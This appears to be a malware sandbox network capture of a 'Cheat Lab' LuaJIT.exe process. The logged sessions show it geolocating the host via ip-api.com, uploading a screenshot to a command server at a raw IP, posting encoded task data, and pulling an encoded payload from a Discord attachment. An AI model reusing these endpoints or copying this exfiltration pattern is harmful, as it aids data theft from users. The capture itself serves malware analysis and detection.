                                                                                                                                                                      Nov 6, 2023 15:35:16.043139935 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.045305014 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.045355082 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.045386076 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.045394897 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.045425892 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.045452118 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.047945976 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.047991991 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.048023939 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.048032045 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.048058987 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.048084974 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.050566912 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.050611019 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.050637960 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.050645113 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.050678968 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.050704956 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.053937912 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.053981066 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.054033995 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.054040909 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.054068089 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.054090977 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.056540966 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.056586981 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.056615114 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.056622028 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.056639910 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.056667089 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.058897972 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.058943033 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.058975935 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.058983088 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.059020996 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.059042931 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.062334061 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.062377930 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.062403917 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.062416077 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.062441111 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.062464952 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.064975023 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.065022945 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.065051079 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.065063953 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.065077066 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.065110922 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.083076954 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.083100080 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.083168983 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.083185911 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.083228111 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.085741997 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.085766077 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.085810900 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.085819006 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.085850000 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.085855961 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.088368893 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.088390112 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.088421106 CET49710443192.168.2.8162.159.135.233

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 6, 2023 15:35:04.876082897 CET | 63009 | 53 | 192.168.2.8 | 1.1.1.1
Nov 6, 2023 15:35:05.029712915 CET | 53 | 63009 | 1.1.1.1 | 192.168.2.8
Nov 6, 2023 15:35:11.444747925 CET | 62737 | 53 | 192.168.2.8 | 1.1.1.1
Nov 6, 2023 15:35:11.598057985 CET | 53 | 62737 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 6, 2023 15:35:04.876082897 CET | 192.168.2.8 | 1.1.1.1 | 0x7ccd | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Nov 6, 2023 15:35:11.444747925 CET | 192.168.2.8 | 1.1.1.1 | 0x4e0 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 6, 2023 15:35:05.029712915 CET | 1.1.1.1 | 192.168.2.8 | 0x7ccd | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Nov 6, 2023 15:35:11.598057985 CET | 1.1.1.1 | 192.168.2.8 | 0x4e0 | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001) | false
Nov 6, 2023 15:35:11.598057985 CET | 1.1.1.1 | 192.168.2.8 | 0x4e0 | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001) | false
Nov 6, 2023 15:35:11.598057985 CET | 1.1.1.1 | 192.168.2.8 | 0x4e0 | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001) | false
Nov 6, 2023 15:35:11.598057985 CET | 1.1.1.1 | 192.168.2.8 | 0x4e0 | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001) | false
Nov 6, 2023 15:35:11.598057985 CET | 1.1.1.1 | 192.168.2.8 | 0x4e0 | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001) | false

• cdn.discordapp.com
• ip-api.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.8 | 49710 | 162.159.135.233 | 443 | C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.8 | 49706 | 208.95.112.1 | 80 | C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe

Timestamp | kBytes transferred | Direction | Data
Nov 6, 2023 15:35:05.240181923 CET | 0 | OUT | GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
Content-Type: application/json
User-Agent: Sun
Host: ip-api.com
Cache-Control: no-cache
Nov 6, 2023 15:35:05.392359972 CET | 1 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Nov 2023 14:35:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 114
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 69 74 79 22 3a 22 53 65 61 74 74 6c 65 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 22 71 75 65 72 79 22 3a 22 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 22 7d
Data Ascii: {"status":"success","countryCode":"US","city":"Seattle","timezone":"America/Los_Angeles","query":"156.146.49.168"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.8 | 49708 | 193.37.71.112 | 80 | C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe

Timestamp | kBytes transferred | Direction | Data
Nov 6, 2023 15:35:06.671708107 CET | 4 | OUT | PUT /loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
Content-Type: multipart/form-data; boundary=qMhxCagN55R5AwRzdpCrqAg3d
User-Agent: Sun
Host: 193.37.71.112
Content-Length: 3933204
Cache-Control: no-cache
Nov 6, 2023 15:35:06.672602892 CET | 15 | OUT | Data Raw: 2d 2d 71 4d 68 78 43 61 67 4e 35 35 52 35 41 77 52 7a 64 70 43 72 71 41 67 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
Data Ascii: --qMhxCagN55R5AwRzdpCrqAg3dContent-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="screen.bmp"BM6($$######$$$$$$$$#
Nov 6, 2023 15:35:11.267046928 CET | 3883 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Nov 2023 14:35:11 GMT
Content-Type: application/json
Content-Length: 2064
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lYxRLgZohEZTUF2mKIZd34r1HmIY4AzlPVJEHy5RVFZmIa7ShhzFniR6rG4Z9y1r2QP%2F8479uiP6xysfBvNd70aX300uDQmOwO2H9hW%2Fs5gBoEVjPPkkZcIcnLkka9M%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
CF-RAY: 821e0fbbdca265a2-FRA
alt-svc: h3=":443"; ma=86400
Nov 6, 2023 15:35:52.639214993 CET | 4921 | OUT | PUT /task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
Content-Type: application/json
User-Agent: Sun
Host: 193.37.71.112
Content-Length: 95
Cache-Control: no-cache
Data Raw: 7b 22 64 61 74 61 22 3a 22 59 57 4d 73 4f 57 45 73 5a 54 4d 73 59 57 55 73 4f 54 67 73 4f 54 55 73 4f 47 49 73 59 54 4d 73 4f 44 41 73 4f 44 51 73 4f 54 45 73 59 6a 63 73 59 7a 6b 73 5a 47 4d 73 5a 44 41 73 59 57 4d 73 59 6a 59 73 5a 57 51 73 4f 54 63 73 59 7a 49 73 4f 57 55 3d 22 7d
Data Ascii: {"data":"YWMsOWEsZTMsYWUsOTgsOTUsOGIsYTMsODAsODQsOTEsYjcsYzksZGMsZDAsYWMsYjYsZWQsOTcsYzIsOWU="}
Nov 6, 2023 15:35:53.208043098 CET | 4921 | IN | HTTP/1.1 204 No Content
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Nov 2023 14:35:53 GMT
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0XOucqCjvv3VPRkcvMwYyuwKnEAD2qCaLXqzPo6gPL9MX0PhDH6TMstGRTGYdpGvaGd2sq74d4ZKiS0ovsapE3zr2%2FLXGd5TtZAKbDNEWr5qvPH4iiYBKCUWG%2FaEIHze94bwHqIUbuMgZzM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
CF-RAY: 821e10c759569c01-FRA
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.8 | 49709 | 162.159.135.233 | 80 | C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe

Timestamp | kBytes transferred | Direction | Data
Nov 6, 2023 15:35:11.752551079 CET | 3885 | OUT | GET /attachments/1166694393298817025/1171047481182793729/2.txt HTTP/1.1
Content-Type: application/json
User-Agent: Sun
Host: cdn.discordapp.com
Cache-Control: no-cache
Nov 6, 2023 15:35:11.924105883 CET | 3886 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 06 Nov 2023 14:35:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 06 Nov 2023 15:35:11 GMT
Location: https://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=5TVRDgPAgt7sc6gsEttnfN0eDDrfzltqZkEmXeQrSGI-1699281311-0-Ach3L7F2jrD2g1+SXtBkwMSCeBQHpGNsVTTE68SlkNmKmSeVEdy1XlrN3NZRaM5Usel7HW4WuQx/wkDdjnJvM5Q=; path=/; expires=Mon, 06-Nov-23 15:05:11 GMT; domain=.discordapp.com; HttpOnly; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q42IxppLrkHmZdrEB4whVBnBS6R4Y3H6PhBmM1miJwy0zOU2%2FGPVN5myohAqB6xZlJo4hqvJ9Q30G3Y1HsqQ95g%2FALicG7F4uLFBAImEeojH7kscW6PlTgNGaWtKRffo2B9v1A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=raqL3qnypn7be7P8ZI1DqIF7wMtLn1AIkoosLiGT3OU-1699281311839-0-604800000; path=/; domain=.discordapp.com; HttpOnly
Server: cloudflare
CF-RAY: 821e0fc6ea5430a7-SEA
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                                                                                                                                      0           192.168.2.8  49710        162.159.135.233  443               C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      Timestamp                kBytes transferred  Direction  Data
                                                                                                                                                                      2023-11-06 14:35:15 UTC  0                   OUT        GET /attachments/1166694393298817025/1171047481182793729/2.txt HTTP/1.1
                                                                                                                                                                      User-Agent: Sun
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: __cf_bm=5TVRDgPAgt7sc6gsEttnfN0eDDrfzltqZkEmXeQrSGI-1699281311-0-Ach3L7F2jrD2g1+SXtBkwMSCeBQHpGNsVTTE68SlkNmKmSeVEdy1XlrN3NZRaM5Usel7HW4WuQx/wkDdjnJvM5Q=; _cfuvid=raqL3qnypn7be7P8ZI1DqIF7wMtLn1AIkoosLiGT3OU-1699281311839-0-604800000
                                                                                                                                                                      2023-11-06 14:35:15 UTC  0                   IN         HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 06 Nov 2023 14:35:15 GMT
                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                      Content-Length: 978522
                                                                                                                                                                      Connection: close
                                                                                                                                                                      CF-Ray: 821e0fdc285ac668-SEA
                                                                                                                                                                      CF-Cache-Status: MISS
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                      Content-Disposition: attachment; filename="2.txt"
                                                                                                                                                                      ETag: "596ff0fbdbcf4853e72308b8178664d6"
                                                                                                                                                                      Expires: Tue, 05 Nov 2024 14:35:15 GMT
                                                                                                                                                                      Last-Modified: Mon, 06 Nov 2023 11:24:36 GMT
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                      x-goog-generation: 1699269876595408
                                                                                                                                                                      x-goog-hash: crc32c=dySmqg==
                                                                                                                                                                      x-goog-hash: md5=WW/w+9vPSFPnIwi4F4Zk1g==
                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                      x-goog-stored-content-length: 978522
                                                                                                                                                                      X-GUploader-UploadID: ABPtcPoBAxXdhwEMXxAeqdLnto03XOQVj2B1WXevQ9JFDCTopA-1EaCYZskeOb4KRiFBuXQXmMo
                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=h5nRtvmgwBNMnGFUtKf3fvcrQX39G4xpccV1Jshs1a4coC74a9EpX8%2Bh1y6Ze1rJ0Lyo6J%2B%2FjKl9JEJKRS1Z3uoWhoqkXTnd%2FOVqyUv6ZPEb9mqy3wis1YS0jMUJq6Bv6miq5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      Data Ascii: ,112,67,3e,79,139,99,71,65,58,d1,86,45,fb,99,57,34,11d,9f,58,8c,153,7a,76,67,62,c3,89,164,e5,b5,53,102,11a,11c,63,5e,51,63,10f,163,157,145,137,72,c3,4f,5e,b5,a0,16b,14b,151,d3,124,9b,ab,62,8f,cf,13f,142,b6,68,77,43,11d,4e,140,150,162,aa,f0,144,c9,124,3d,f
                                                                                                                                                                      2023-11-06 14:35:15 UTC24INData Raw: 37 36 2c 31 34 38 2c 62 37 2c 35 33 2c 38 33 2c 64 65 2c 38 34 2c 31 32 33 2c 36 34 2c 31 30 37 2c 65 31 2c 38 62 2c 31 32 63 2c 63 32 2c 63 64 2c 31 32 62 2c 64 38 2c 38 36 2c 31 33 61 2c 66 35 2c 39 39 2c 31 34 32 2c 31 32 33 2c 35 35 2c 35 61 2c 36 37 2c 36 32 2c 34 37 2c 65 36 2c 66 64 2c 61 66 2c 31 36 39 2c 64 34 2c 62 63 2c 31 33 62 2c 38 66 2c 31 32 39 2c 38 36 2c 31 34 64 2c 36 33 2c 35 35 2c 36 35 2c 35 63 2c 62 61 2c 34 36 2c 31 32 31 2c 63 63 2c 31 34 32 2c 31 34 65 2c 31 33 30 2c 64 33 2c 31 32 63 2c 63 30 2c 35 37 2c 39 65 2c 31 31 34 2c 39 61 2c 31 35 32 2c 36 34 2c 36 62 2c 31 30 34 2c 63 66 2c 31 32 33 2c 31 33 30 2c 31 33 33 2c 31 31 30 2c 31 34 32 2c 31 33 33 2c 31 33 31 2c 65 34 2c 31 32 39 2c 62 38 2c 39 39 2c 36 35 2c 38 62 2c 31 30
                                                                                                                                                                      Data Ascii: 76,148,b7,53,83,de,84,123,64,107,e1,8b,12c,c2,cd,12b,d8,86,13a,f5,99,142,123,55,5a,67,62,47,e6,fd,af,169,d4,bc,13b,8f,129,86,14d,63,55,65,5c,ba,46,121,cc,142,14e,130,d3,12c,c0,57,9e,114,9a,152,64,6b,104,cf,123,130,133,110,142,133,131,e4,129,b8,99,65,8b,10
                                                                                                                                                                      2023-11-06 14:35:15 UTC25INData Raw: 2c 38 64 2c 38 38 2c 37 34 2c 35 61 2c 63 36 2c 62 66 2c 39 32 2c 61 62 2c 31 30 38 2c 38 37 2c 38 35 2c 35 31 2c 31 34 62 2c 31 34 35 2c 37 66 2c 35 38 2c 34 36 2c 39 31 2c 62 65 2c 31 33 30 2c 62 37 2c 35 62 2c 39 62 2c 34 65 2c 64 36 2c 34 65 2c 62 63 2c 36 62 2c 31 35 33 2c 36 66 2c 31 33 62 2c 62 37 2c 37 63 2c 34 34 2c 61 37 2c 31 31 61 2c 63 61 2c 31 30 65 2c 65 31 2c 35 62 2c 39 63 2c 64 61 2c 31 30 34 2c 39 31 2c 36 33 2c 31 33 64 2c 31 35 34 2c 31 35 32 2c 31 34 35 2c 31 33 37 2c 61 33 2c 37 38 2c 31 32 62 2c 31 34 30 2c 31 32 30 2c 31 34 64 2c 31 36 62 2c 61 35 2c 64 35 2c 64 30 2c 31 35 30 2c 35 61 2c 39 61 2c 31 33 64 2c 37 62 2c 37 64 2c 39 31 2c 31 34 65 2c 62 38 2c 38 66 2c 37 37 2c 35 32 2c 62 38 2c 66 37 2c 34 31 2c 35 31 2c 36 33 2c 64
                                                                                                                                                                      Data Ascii: ,8d,88,74,5a,c6,bf,92,ab,108,87,85,51,14b,145,7f,58,46,91,be,130,b7,5b,9b,4e,d6,4e,bc,6b,153,6f,13b,b7,7c,44,a7,11a,ca,10e,e1,5b,9c,da,104,91,63,13d,154,152,145,137,a3,78,12b,140,120,14d,16b,a5,d5,d0,150,5a,9a,13d,7b,7d,91,14e,b8,8f,77,52,b8,f7,41,51,63,d
                                                                                                                                                                      2023-11-06 14:35:15 UTC27INData Raw: 31 32 65 2c 64 66 2c 31 35 39 2c 62 64 2c 31 34 61 2c 63 36 2c 34 66 2c 37 34 2c 35 61 2c 66 38 2c 31 33 62 2c 63 64 2c 31 32 62 2c 35 36 2c 33 34 2c 34 31 2c 35 31 2c 62 39 2c 31 33 64 2c 31 30 33 2c 36 61 2c 34 36 2c 33 38 2c 38 66 2c 31 35 38 2c 37 65 2c 36 30 2c 33 31 2c 34 65 2c 63 32 2c 31 33 34 2c 31 31 63 2c 38 38 2c 35 34 2c 35 61 2c 62 64 2c 31 34 61 2c 65 64 2c 36 31 2c 37 34 2c 35 61 2c 63 33 2c 31 33 33 2c 31 31 34 2c 35 65 2c 33 34 2c 33 32 2c 39 37 2c 31 33 39 2c 65 38 2c 35 37 2c 36 35 2c 35 38 2c 39 63 2c 31 32 30 2c 62 39 2c 38 62 2c 34 33 2c 34 66 2c 39 39 2c 61 35 2c 39 37 2c 38 63 2c 35 32 2c 31 35 33 2c 31 33 34 2c 36 34 2c 36 37 2c 36 32 2c 62 62 2c 31 30 38 2c 39 38 2c 66 64 2c 31 31 64 2c 38 62 2c 62 62 2c 34 33 2c 39 32 2c 66 35
                                                                                                                                                                      Data Ascii: 12e,df,159,bd,14a,c6,4f,74,5a,f8,13b,cd,12b,56,34,41,51,b9,13d,103,6a,46,38,8f,158,7e,60,31,4e,c2,134,11c,88,54,5a,bd,14a,ed,61,74,5a,c3,133,114,5e,34,32,97,139,e8,57,65,58,9c,120,b9,8b,43,4f,99,a5,97,8c,52,153,134,64,67,62,bb,108,98,fd,11d,8b,bb,43,92,f5
                                                                                                                                                                      2023-11-06 14:35:15 UTC28INData Raw: 30 37 2c 34 38 2c 39 61 2c 35 31 2c 37 31 2c 36 34 2c 35 35 2c 63 64 2c 39 30 2c 66 64 2c 37 38 2c 33 39 2c 63 37 2c 31 32 62 2c 38 64 2c 34 64 2c 34 65 2c 36 63 2c 63 66 2c 31 31 36 2c 37 37 2c 31 33 66 2c 38 63 2c 64 31 2c 31 35 36 2c 31 33 37 2c 35 39 2c 64 63 2c 31 30 61 2c 61 64 2c 34 62 2c 31 30 32 2c 31 31 62 2c 36 66 2c 31 31 30 2c 62 35 2c 37 35 2c 65 36 2c 31 35 30 2c 31 36 34 2c 63 63 2c 36 35 2c 61 32 2c 33 39 2c 66 64 2c 38 38 2c 31 34 37 2c 38 31 2c 64 62 2c 61 30 2c 31 34 39 2c 31 30 65 2c 61 62 2c 39 38 2c 35 61 2c 31 36 36 2c 39 38 2c 31 32 30 2c 66 30 2c 39 32 2c 35 61 2c 36 64 2c 61 34 2c 63 37 2c 31 34 32 2c 36 61 2c 38 35 2c 31 34 30 2c 36 36 2c 63 37 2c 31 30 35 2c 61 35 2c 35 38 2c 61 35 2c 39 36 2c 39 34 2c 31 33 39 2c 31 30 36 2c
                                                                                                                                                                      Data Ascii: 07,48,9a,51,71,64,55,cd,90,fd,78,39,c7,12b,8d,4d,4e,6c,cf,116,77,13f,8c,d1,156,137,59,dc,10a,ad,4b,102,11b,6f,110,b5,75,e6,150,164,cc,65,a2,39,fd,88,147,81,db,a0,149,10e,ab,98,5a,166,98,120,f0,92,5a,6d,a4,c7,142,6a,85,140,66,c7,105,a5,58,a5,96,94,139,106,
                                                                                                                                                                      2023-11-06 14:35:15 UTC29INData Raw: 35 2c 62 61 2c 37 39 2c 37 64 2c 37 30 2c 63 65 2c 31 32 30 2c 33 34 2c 31 34 37 2c 61 37 2c 31 32 33 2c 63 66 2c 38 66 2c 62 66 2c 31 32 33 2c 37 33 2c 65 64 2c 62 36 2c 61 30 2c 66 37 2c 62 65 2c 61 36 2c 35 33 2c 37 37 2c 63 65 2c 37 31 2c 61 32 2c 38 32 2c 39 35 2c 36 33 2c 65 30 2c 38 32 2c 63 63 2c 38 37 2c 37 63 2c 33 39 2c 62 32 2c 34 36 2c 31 32 65 2c 62 34 2c 31 30 66 2c 37 38 2c 38 37 2c 31 32 35 2c 65 37 2c 31 33 36 2c 65 35 2c 63 34 2c 31 35 65 2c 63 33 2c 34 34 2c 66 66 2c 64 38 2c 64 31 2c 38 38 2c 31 30 35 2c 34 33 2c 33 34 2c 66 32 2c 62 36 2c 35 61 2c 31 32 61 2c 39 62 2c 63 39 2c 64 62 2c 34 36 2c 33 38 2c 33 39 2c 31 35 62 2c 61 31 2c 38 63 2c 63 31 2c 34 65 2c 36 63 2c 31 30 63 2c 63 37 2c 37 34 2c 31 31 62 2c 61 30 2c 63 62 2c 65 33
                                                                                                                                                                      Data Ascii: 5,ba,79,7d,70,ce,120,34,147,a7,123,cf,8f,bf,123,73,ed,b6,a0,f7,be,a6,53,77,ce,71,a2,82,95,63,e0,82,cc,87,7c,39,b2,46,12e,b4,10f,78,87,125,e7,136,e5,c4,15e,c3,44,ff,d8,d1,88,105,43,34,f2,b6,5a,12a,9b,c9,db,46,38,39,15b,a1,8c,c1,4e,6c,10c,c7,74,11b,a0,cb,e3
                                                                                                                                                                      2023-11-06 14:35:15 UTC31INData Raw: 35 38 2c 39 64 2c 64 64 2c 62 38 2c 36 34 2c 61 64 2c 39 61 2c 31 32 32 2c 38 65 2c 63 64 2c 37 62 2c 65 35 2c 31 35 66 2c 64 36 2c 63 63 2c 34 66 2c 66 62 2c 33 33 2c 34 32 2c 35 31 2c 36 33 2c 35 35 2c 39 65 2c 39 64 2c 34 65 2c 61 63 2c 34 32 2c 66 62 2c 61 30 2c 35 37 2c 62 34 2c 39 33 2c 37 34 2c 35 30 2c 64 62 2c 37 65 2c 64 64 2c 39 66 2c 31 36 33 2c 65 32 2c 37 36 2c 36 36 2c 65 39 2c 36 61 2c 61 30 2c 31 30 62 2c 62 30 2c 38 38 2c 31 33 30 2c 65 35 2c 36 33 2c 36 30 2c 66 37 2c 31 31 35 2c 61 62 2c 65 31 2c 38 62 2c 31 33 34 2c 31 32 34 2c 61 63 2c 31 34 32 2c 35 36 2c 62 36 2c 31 32 30 2c 65 30 2c 35 34 2c 64 63 2c 37 31 2c 64 63 2c 35 63 2c 61 39 2c 65 62 2c 38 64 2c 35 30 2c 66 65 2c 37 38 2c 37 63 2c 31 30 31 2c 31 33 61 2c 39 33 2c 37 61 2c
                                                                                                                                                                      Data Ascii: 58,9d,dd,b8,64,ad,9a,122,8e,cd,7b,e5,15f,d6,cc,4f,fb,33,42,51,63,55,9e,9d,4e,ac,42,fb,a0,57,b4,93,74,50,db,7e,dd,9f,163,e2,76,66,e9,6a,a0,10b,b0,88,130,e5,63,60,f7,115,ab,e1,8b,134,124,ac,142,56,b6,120,e0,54,dc,71,dc,5c,a9,eb,8d,50,fe,78,7c,101,13a,93,7a,
